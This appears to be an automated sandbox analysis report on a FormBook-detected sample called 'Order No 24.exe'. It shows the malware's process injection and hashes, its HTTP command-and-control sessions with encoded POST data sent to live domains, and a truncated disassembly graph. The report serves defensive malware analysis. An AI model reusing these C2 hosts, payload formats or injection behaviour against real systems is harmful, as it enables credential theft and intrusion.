                                                                                                                                Data Raw: 62 64 6c 44 3d 69 6e 36 79 75 2f 59 46 2b 39 44 54 35 4e 2f 34 6a 4e 54 6b 73 32 47 51 54 45 51 50 7a 76 7a 73 4c 42 71 7a 46 42 6e 61 73 73 31 75 32 63 44 50 50 50 31 72 65 75 58 32 7a 64 31 69 55 36 47 75 6d 43 39 42 72 4b 52 69 61 4f 36 61 77 47 2f 45 4d 2b 76 78 7a 44 69 47 52 50 36 52 78 4a 6d 72 6c 34 4e 45 70 53 6b 36 46 58 44 38 6d 45 57 50 36 4d 57 30 4d 31 5a 39 72 4d 62 44 6d 32 52 4e 67 66 39 79 77 64 37 4d 73 36 46 58 7a 53 77 32 48 72 6b 2b 51 6d 4d 6d 34 75 34 63 78 4f 37 33 65 74 4c 63 55 31 79 4a 68 7a 66 32 68 62 38 2f 7a 31 4f 51 76 71 36 68 64 32 2b 75 41 76 45 74 61 68 67 43 6e 30 73 4d 77 64 6d 59 6f 48 4e 6c 46 54 76 4e 70 32 61 54 36 61 41 6c 65 66 6b 67 70 41 3d 3d
                                                                                                                                Data Ascii: bdlD=in6yu/YF+9DT5N/4jNTks2GQTEQPzvzsLBqzFBnass1u2cDPPP1reuX2zd1iU6GumC9BrKRiaO6awG/EM+vxzDiGRP6RxJmrl4NEpSk6FXD8mEWP6MW0M1Z9rMbDm2RNgf9ywd7Ms6FXzSw2Hrk+QmMm4u4cxO73etLcU1yJhzf2hb8/z1OQvq6hd2+uAvEtahgCn0sMwdmYoHNlFTvNp2aT6aAlefkgpA==


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                47192.168.2.6500353.33.130.190801468C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Nov 18, 2024 16:28:42.594012022 CET1698OUTPOST /ucmb/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Content-Length: 1245
                                                                                                                                Cache-Control: max-age=0
                                                                                                                                Connection: close
                                                                                                                                Host: www.marketprediction.app
                                                                                                                                Origin: http://www.marketprediction.app
                                                                                                                                Referer: http://www.marketprediction.app/ucmb/
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                Data Raw: 62 64 6c 44 3d 69 6e 36 79 75 2f 59 46 2b 39 44 54 35 4e 2f 34 6a 4e 54 6b 73 32 47 51 54 45 51 50 7a 76 7a 73 4c 42 71 7a 46 42 6e 61 73 71 74 75 32 4b 50 50 4f 73 64 72 64 75 58 32 2b 39 31 76 55 36 48 79 6d 42 4e 46 72 4b 63 66 61 4e 53 61 77 6b 33 45 64 37 50 78 39 44 69 47 64 76 36 63 76 35 6d 2b 6c 37 31 49 70 54 55 36 46 58 44 38 6d 47 4f 50 38 64 57 30 58 31 5a 36 39 63 62 31 33 6d 52 31 67 66 46 69 77 64 2f 63 74 4f 4a 58 79 79 67 32 46 5a 4d 2b 52 47 4d 6b 2f 75 34 55 78 4a 7a 34 65 74 57 6c 55 30 47 7a 68 77 44 32 69 39 78 51 67 78 36 56 73 49 2b 62 4a 30 6a 4b 49 35 34 4e 55 6e 39 79 33 48 77 57 2b 4a 53 49 70 44 4a 7a 41 68 69 55 6d 46 61 6b 7a 64 39 47 51 64 39 2f 31 45 70 57 66 72 31 70 4d 50 6b 53 50 35 34 4d 45 41 55 34 4e 52 31 2b 59 62 30 73 72 64 55 34 38 48 6a 78 37 48 55 66 4c 43 33 54 42 4d 63 31 62 2b 63 50 5a 64 76 50 74 2b 61 78 5a 4d 58 38 4e 39 4d 33 51 37 41 57 32 35 75 41 79 51 56 5a 68 32 75 67 69 4c 6b 46 42 74 32 65 6e 6c 53 56 58 4a 75 58 63 67 49 79 42 4b 35 52 46 [TRUNCATED]
                                                                                                                                Data Ascii: bdlD=in6yu/YF+9DT5N/4jNTks2GQTEQPzvzsLBqzFBnasqtu2KPPOsdrduX2+91vU6HymBNFrKcfaNSawk3Ed7Px9DiGdv6cv5m+l71IpTU6FXD8mGOP8dW0X1Z69cb13mR1gfFiwd/ctOJXyyg2FZM+RGMk/u4UxJz4etWlU0GzhwD2i9xQgx6VsI+bJ0jKI54NUn9y3HwW+JSIpDJzAhiUmFakzd9GQd9/1EpWfr1pMPkSP54MEAU4NR1+Yb0srdU48Hjx7HUfLC3TBMc1b+cPZdvPt+axZMX8N9M3Q7AW25uAyQVZh2ugiLkFBt2enlSVXJuXcgIyBK5RFvmhzvb8X8WKCrQWMGNNYvISwoaYKL3HK8+QhCY3gj+zXFk87wN6ehrZryQ3XHG2yTtPcK3rZtrNcdVjvLB+NmGz21JSHqYJcL1WuxB+K0B+OSUIB1/h8zKlgbREw7vQdXg6e/DWh2CBZ7sMp6OZ8vHmnCKPkkbCjN53Md3u0Jhna+MIPEcCn4FgeIMhirFyXRZNXmav071Vd6LwMnOQdnAjFp8kndH0jE9Jbwf8q2LrtjTh7OnC8wGxOSkN3nXnDGeFv8c8uvx8Q+2plIthOlG9qlljhMeRcT7kmg6flrTZ3M2kpm/V7GuHg+NLyza+TVy+/+sz9P403GwYB286rmBqajmRXQxb+OvQuygbyOWHEwXmUkvSR10kuIy45Q35KJdjKGbDUfuxKiH1/WMgjt2VtndKWtDVK9emPsQ+5mm8YutdTkWxxF+S4A4gx+AOOjmULpvJZcidMMNoup0/pPdI0sZ7sSOUMCQsj9Or6kjDBc8//02/9G4MN6VTML8fc5i9WcY4nHbZmBNSUPGeFU3PZgmMWjoDjUnBQZ4v/01U6f13iD+njehwVrDx0k9/cZoz1fnKKTF68HNFM7haVzMvJXnil8fH0gTC7V8J91oy8NeCggwTEnzleZ9JSRVEFkL54Uu+0D1Eowu7TxDxclBr0s2XaPgX/F3 [TRUNCATED]


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                48192.168.2.6500363.33.130.190801468C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Nov 18, 2024 16:28:45.141664982 CET396OUTGET /ucmb/?92=DPyPNvf84fs0yXSp&bdlD=vlSStPgYi/rw0++s6ZKUsH+lT2dpjOyqKmbfTh2Wh6BCmYHhC9h1DMbb37dpPZ/1mBJsvII6DMGZ/nD5LfnLzkLvWq29n5ve7+0lsSpjEyv7qUGv0unsJnIf6ZDw73FDzrF564s= HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Connection: close
                                                                                                                                Host: www.marketprediction.app
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                Nov 18, 2024 16:28:45.781634092 CET416INHTTP/1.1 200 OK
                                                                                                                                Server: openresty
                                                                                                                                Date: Mon, 18 Nov 2024 15:28:45 GMT
                                                                                                                                Content-Type: text/html
                                                                                                                                Content-Length: 276
                                                                                                                                Connection: close
                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 39 32 3d 44 50 79 50 4e 76 66 38 34 66 73 30 79 58 53 70 26 62 64 6c 44 3d 76 6c 53 53 74 50 67 59 69 2f 72 77 30 2b 2b 73 36 5a 4b 55 73 48 2b 6c 54 32 64 70 6a 4f 79 71 4b 6d 62 66 54 68 32 57 68 36 42 43 6d 59 48 68 43 39 68 31 44 4d 62 62 33 37 64 70 50 5a 2f 31 6d 42 4a 73 76 49 49 36 44 4d 47 5a 2f 6e 44 35 4c 66 6e 4c 7a 6b 4c 76 57 71 32 39 6e 35 76 65 37 2b 30 6c 73 53 70 6a 45 79 76 37 71 55 47 76 30 75 6e 73 4a 6e 49 66 36 5a 44 77 37 33 46 44 7a 72 46 35 36 34 73 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?92=DPyPNvf84fs0yXSp&bdlD=vlSStPgYi/rw0++s6ZKUsH+lT2dpjOyqKmbfTh2Wh6BCmYHhC9h1DMbb37dpPZ/1mBJsvII6DMGZ/nD5LfnLzkLvWq29n5ve7+0lsSpjEyv7qUGv0unsJnIf6ZDw73FDzrF564s="}</script></head></html>


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                49192.168.2.6500373.33.130.190801468C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Nov 18, 2024 16:29:02.023539066 CET397OUTGET /yjfe/?bdlD=ssLl/70GAhUcKdDgdVfXop7fxRMgpYiZ3vsJccOUHyCqzcpfrIrrd04a2OAN6WfHhwyB0RQ+DljnHu6RgupRZtH+3BcbYh7VvBUTG1QOTnOjymLXFng0zEllYHEl5m4i96WUTr0=&92=DPyPNvf84fs0yXSp HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Connection: close
                                                                                                                                Host: www.corpseflowerwatch.org
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                Nov 18, 2024 16:29:02.658025980 CET416INHTTP/1.1 200 OK
                                                                                                                                Server: openresty
                                                                                                                                Date: Mon, 18 Nov 2024 15:29:02 GMT
                                                                                                                                Content-Type: text/html
                                                                                                                                Content-Length: 276
                                                                                                                                Connection: close
                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 62 64 6c 44 3d 73 73 4c 6c 2f 37 30 47 41 68 55 63 4b 64 44 67 64 56 66 58 6f 70 37 66 78 52 4d 67 70 59 69 5a 33 76 73 4a 63 63 4f 55 48 79 43 71 7a 63 70 66 72 49 72 72 64 30 34 61 32 4f 41 4e 36 57 66 48 68 77 79 42 30 52 51 2b 44 6c 6a 6e 48 75 36 52 67 75 70 52 5a 74 48 2b 33 42 63 62 59 68 37 56 76 42 55 54 47 31 51 4f 54 6e 4f 6a 79 6d 4c 58 46 6e 67 30 7a 45 6c 6c 59 48 45 6c 35 6d 34 69 39 36 57 55 54 72 30 3d 26 39 32 3d 44 50 79 50 4e 76 66 38 34 66 73 30 79 58 53 70 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?bdlD=ssLl/70GAhUcKdDgdVfXop7fxRMgpYiZ3vsJccOUHyCqzcpfrIrrd04a2OAN6WfHhwyB0RQ+DljnHu6RgupRZtH+3BcbYh7VvBUTG1QOTnOjymLXFng0zEllYHEl5m4i96WUTr0=&92=DPyPNvf84fs0yXSp"}</script></head></html>


                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                50192.168.2.650038217.70.184.5080
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Nov 18, 2024 16:29:08.234448910 CET640OUTPOST /gnvu/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Content-Length: 209
                                                                                                                                Cache-Control: max-age=0
                                                                                                                                Connection: close
                                                                                                                                Host: www.4nk.education
                                                                                                                                Origin: http://www.4nk.education
                                                                                                                                Referer: http://www.4nk.education/gnvu/
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                Data Raw: 62 64 6c 44 3d 71 7a 71 44 68 39 6e 49 74 74 51 32 62 75 37 53 42 4d 30 4a 54 37 32 62 56 78 47 36 39 37 31 46 2b 2f 4b 6d 62 59 2f 68 64 30 48 4b 37 73 53 6b 76 34 53 34 61 43 4c 48 30 5a 68 74 7a 6a 46 74 43 7a 4f 6c 72 57 68 71 42 73 76 41 53 31 46 4f 77 41 51 6f 73 57 37 61 37 49 47 35 6b 79 4a 53 39 48 55 74 6f 64 77 39 56 6a 50 51 68 2f 73 42 51 54 61 2b 37 50 2b 47 71 2f 76 39 45 75 77 68 63 47 64 4a 68 6b 49 63 4d 59 74 36 75 6e 30 79 37 57 58 45 6f 34 66 51 68 4f 44 56 54 51 73 75 54 47 72 70 4f 49 47 72 70 39 6b 56 42 4e 48 35 32 79 68 52 4e 54 71 44 6c 61 52 50 43 71 4c 64 4d 58 6e 62 6f 4c 75 6f 57 37 55 4a
                                                                                                                                Data Ascii: bdlD=qzqDh9nIttQ2bu7SBM0JT72bVxG6971F+/KmbY/hd0HK7sSkv4S4aCLH0ZhtzjFtCzOlrWhqBsvAS1FOwAQosW7a7IG5kyJS9HUtodw9VjPQh/sBQTa+7P+Gq/v9EuwhcGdJhkIcMYt6un0y7WXEo4fQhODVTQsuTGrpOIGrp9kVBNH52yhRNTqDlaRPCqLdMXnboLuoW7UJ
                                                                                                                                Nov 18, 2024 16:29:09.044819117 CET608INHTTP/1.1 501 Unsupported method ('POST')
                                                                                                                                Server: nginx
                                                                                                                                Date: Mon, 18 Nov 2024 15:29:08 GMT
                                                                                                                                Content-Type: text/html
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                                                                                                                Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                                                                                                                Statistics

                                                                                                                                CPU Usage

                                                                                                                                Click to jump to process

                                                                                                                                Memory Usage

                                                                                                                                Click to jump to process

                                                                                                                                High Level Behavior Distribution

                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                Behavior

                                                                                                                                Click to jump to process

                                                                                                                                System Behavior

                                                                                                                                General

                                                                                                                                Target ID:0
                                                                                                                                Start time:10:24:56
                                                                                                                                Start date:18/11/2024
                                                                                                                                Path:C:\Users\user\Desktop\Order No 24.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"C:\Users\user\Desktop\Order No 24.exe"
                                                                                                                                Imagebase:0x980000
                                                                                                                                File size:1'218'048 bytes
                                                                                                                                MD5 hash:E785B831C8183B40F176D34C36E8AD3E
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:low
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:2
                                                                                                                                Start time:10:24:57
                                                                                                                                Start date:18/11/2024
                                                                                                                                Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"C:\Users\user\Desktop\Order No 24.exe"
                                                                                                                                Imagebase:0xb20000
                                                                                                                                File size:46'504 bytes
                                                                                                                                MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Yara matches:
                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2300832029.0000000000490000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2301144839.0000000002D30000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2301597898.0000000003D50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:3
                                                                                                                                Start time:10:25:03
                                                                                                                                Start date:18/11/2024
                                                                                                                                Path:C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe"
                                                                                                                                Imagebase:0xcc0000
                                                                                                                                File size:140'800 bytes
                                                                                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Yara matches:
                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4577455340.00000000035C0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                Reputation:high
                                                                                                                                Has exited:false

                                                                                                                                General

                                                                                                                                Target ID:4
                                                                                                                                Start time:10:25:10
                                                                                                                                Start date:18/11/2024
                                                                                                                                Path:C:\Windows\SysWOW64\net.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"C:\Windows\SysWOW64\net.exe"
                                                                                                                                Imagebase:0x670000
                                                                                                                                File size:47'104 bytes
                                                                                                                                MD5 hash:31890A7DE89936F922D44D677F681A7F
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Yara matches:
                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4576339259.00000000028E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4575842016.0000000000390000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4577728076.0000000002B80000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                Reputation:high
                                                                                                                                Has exited:false

                                                                                                                                General

                                                                                                                                Target ID:7
                                                                                                                                Start time:10:25:22
                                                                                                                                Start date:18/11/2024
                                                                                                                                Path:C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe"
                                                                                                                                Imagebase:0xcc0000
                                                                                                                                File size:140'800 bytes
                                                                                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Yara matches:
                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4580363583.0000000005160000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                Reputation:high
                                                                                                                                Has exited:false

                                                                                                                                General

                                                                                                                                Target ID:10
                                                                                                                                Start time:10:25:34
                                                                                                                                Start date:18/11/2024
                                                                                                                                Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                                                Imagebase:0x7ff728280000
                                                                                                                                File size:676'768 bytes
                                                                                                                                MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                Disassembly

                                                                                                                                Reset < >

                                                                                                                                  Execution Graph

                                                                                                                                  Execution Coverage:3.9%
                                                                                                                                  Dynamic/Decrypted Code Coverage:1.5%
                                                                                                                                  Signature Coverage:10.3%
                                                                                                                                  Total number of Nodes:2000
                                                                                                                                  Total number of Limit Nodes:155
                                                                                                                                  execution_graph 93558 9f19dd 93563 984a30 93558->93563 93560 9f19f1 93583 9a0f0a 52 API calls __cinit 93560->93583 93562 9f19fb 93564 984a40 __ftell_nolock 93563->93564 93584 98d7f7 93564->93584 93568 984aff 93596 98363c 93568->93596 93575 98d7f7 48 API calls 93576 984b32 93575->93576 93618 9849fb 93576->93618 93578 984b3d _wcscat Mailbox __NMSG_WRITE 93579 984b43 Mailbox 93578->93579 93580 9861a6 48 API calls 93578->93580 93582 9864cf 48 API calls 93578->93582 93632 98ce19 93578->93632 93579->93560 93580->93578 93582->93578 93583->93562 93638 99f4ea 93584->93638 93586 98d818 93587 99f4ea 48 API calls 93586->93587 93588 984af6 93587->93588 93589 985374 93588->93589 93669 9af8a0 93589->93669 93592 98ce19 48 API calls 93593 9853a7 93592->93593 93671 98660f 93593->93671 93595 9853b1 Mailbox 93595->93568 93597 983649 __ftell_nolock 93596->93597 93718 98366c GetFullPathNameW 93597->93718 93599 98365a 93600 986a63 48 API calls 93599->93600 93601 983669 93600->93601 93602 98518c 93601->93602 93603 985197 93602->93603 93604 9f1ace 93603->93604 93605 98519f 93603->93605 93607 986b4a 48 API calls 93604->93607 93720 985130 93605->93720 93609 9f1adb __NMSG_WRITE 93607->93609 93608 984b18 93612 9864cf 93608->93612 93610 99ee75 48 API calls 93609->93610 93611 9f1b07 _memcpy_s 93610->93611 93613 98651b 93612->93613 93617 9864dd _memcpy_s 93612->93617 93615 99f4ea 48 API calls 93613->93615 93614 99f4ea 48 API calls 93616 984b29 93614->93616 93615->93617 93616->93575 93617->93614 93735 98bcce 93618->93735 93621 9f41cc RegQueryValueExW 93623 9f4246 RegCloseKey 93621->93623 93624 9f41e5 93621->93624 93622 984a2b 93622->93578 93625 99f4ea 48 API calls 93624->93625 93626 9f41fe 93625->93626 93741 9847b7 93626->93741 93629 9f423b 93629->93623 93630 9f4224 93631 986a63 48 API calls 93630->93631 93631->93629 93633 98ce28 __NMSG_WRITE 93632->93633 93634 99ee75 48 API calls 93633->93634 93635 98ce50 _memcpy_s 93634->93635 93636 99f4ea 48 API calls 93635->93636 93637 98ce66 93636->93637 93637->93578 93641 99f4f2 __calloc_impl 93638->93641 93640 99f50c 93640->93586 93641->93640 93642 99f50e std::exception::exception 93641->93642 93647 9a395c 93641->93647 93661 9a6805 RaiseException 93642->93661 93644 99f538 93662 9a673b 47 API calls _free 93644->93662 93646 99f54a 93646->93586 93648 9a39d7 __calloc_impl 93647->93648 93652 9a3968 __calloc_impl 93647->93652 93668 9a7c0e 47 API calls __getptd_noexit 93648->93668 93651 9a399b RtlAllocateHeap 93651->93652 93660 9a39cf 93651->93660 93652->93651 93654 9a39c3 93652->93654 93655 9a3973 93652->93655 93658 9a39c1 93652->93658 93666 9a7c0e 47 API calls __getptd_noexit 93654->93666 93655->93652 93663 9a81c2 47 API calls 2 library calls 93655->93663 93664 9a821f 47 API calls 6 library calls 93655->93664 93665 9a1145 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 93655->93665 93667 9a7c0e 47 API calls __getptd_noexit 93658->93667 93660->93641 93661->93644 93662->93646 93663->93655 93664->93655 93666->93658 93667->93660 93668->93660 93670 985381 GetModuleFileNameW 93669->93670 93670->93592 93672 9af8a0 __ftell_nolock 93671->93672 93673 98661c GetFullPathNameW 93672->93673 93678 986a63 93673->93678 93675 986643 93689 986571 93675->93689 93679 986adf 93678->93679 93681 986a6f __NMSG_WRITE 93678->93681 93706 98b18b 93679->93706 93682 986a8b 93681->93682 93683 986ad7 93681->93683 93693 986b4a 93682->93693 93705 98c369 48 API calls 93683->93705 93686 986a95 93696 99ee75 93686->93696 93688 986ab6 _memcpy_s 93688->93675 93690 98657f 93689->93690 93691 98b18b 48 API calls 93690->93691 93692 98658f 93691->93692 93692->93595 93694 99f4ea 48 API calls 93693->93694 93695 986b54 93694->93695 93695->93686 93697 99f4ea __calloc_impl 93696->93697 93698 9a395c std::exception::_Copy_str 47 API calls 93697->93698 93699 99f50c 93697->93699 93700 99f50e std::exception::exception 93697->93700 93698->93697 93699->93688 93710 9a6805 RaiseException 93700->93710 93702 99f538 93711 9a673b 47 API calls _free 93702->93711 93704 99f54a 93704->93688 93705->93688 93707 98b1a2 _memcpy_s 93706->93707 93708 98b199 93706->93708 93707->93688 93708->93707 93712 98bdfa 93708->93712 93710->93702 93711->93704 93713 98be0d 93712->93713 93717 98be0a _memcpy_s 93712->93717 93714 99f4ea 48 API calls 93713->93714 93715 98be17 93714->93715 93716 99ee75 48 API calls 93715->93716 93716->93717 93717->93707 93719 98368a 93718->93719 93719->93599 93721 98513f __NMSG_WRITE 93720->93721 93722 9f1b27 93721->93722 93723 985151 93721->93723 93725 986b4a 48 API calls 93722->93725 93730 98bb85 93723->93730 93727 9f1b34 93725->93727 93726 98515e _memcpy_s 93726->93608 93728 99ee75 48 API calls 93727->93728 93729 9f1b57 _memcpy_s 93728->93729 93731 98bb9b 93730->93731 93733 98bb96 _memcpy_s 93730->93733 93732 99ee75 48 API calls 93731->93732 93734 9f1b77 93731->93734 93732->93733 93733->93726 93734->93734 93736 98bce8 93735->93736 93740 984a0a RegOpenKeyExW 93735->93740 93737 99f4ea 48 API calls 93736->93737 93738 98bcf2 93737->93738 93739 99ee75 48 API calls 93738->93739 93739->93740 93740->93621 93740->93622 93742 99f4ea 48 API calls 93741->93742 93743 9847c9 RegQueryValueExW 93742->93743 93743->93629 93743->93630 93744 9f197b 93749 99dd94 93744->93749 93748 9f198a 93750 99f4ea 48 API calls 93749->93750 93751 99dd9c 93750->93751 93752 99ddb0 93751->93752 93757 99df3d 93751->93757 93756 9a0f0a 52 API calls __cinit 93752->93756 93756->93748 93758 99dda8 93757->93758 93759 99df46 93757->93759 93761 99ddc0 93758->93761 93789 9a0f0a 52 API calls __cinit 93759->93789 93762 98d7f7 48 API calls 93761->93762 93763 99ddd7 GetVersionExW 93762->93763 93764 986a63 48 API calls 93763->93764 93765 99de1a 93764->93765 93790 99dfb4 93765->93790 93768 986571 48 API calls 93769 99de2e 93768->93769 93771 9f24c8 93769->93771 93794 99df77 93769->93794 93773 99dea4 GetCurrentProcess 93803 99df5f LoadLibraryA GetProcAddress 93773->93803 93774 99debb 93776 99df31 GetSystemInfo 93774->93776 93777 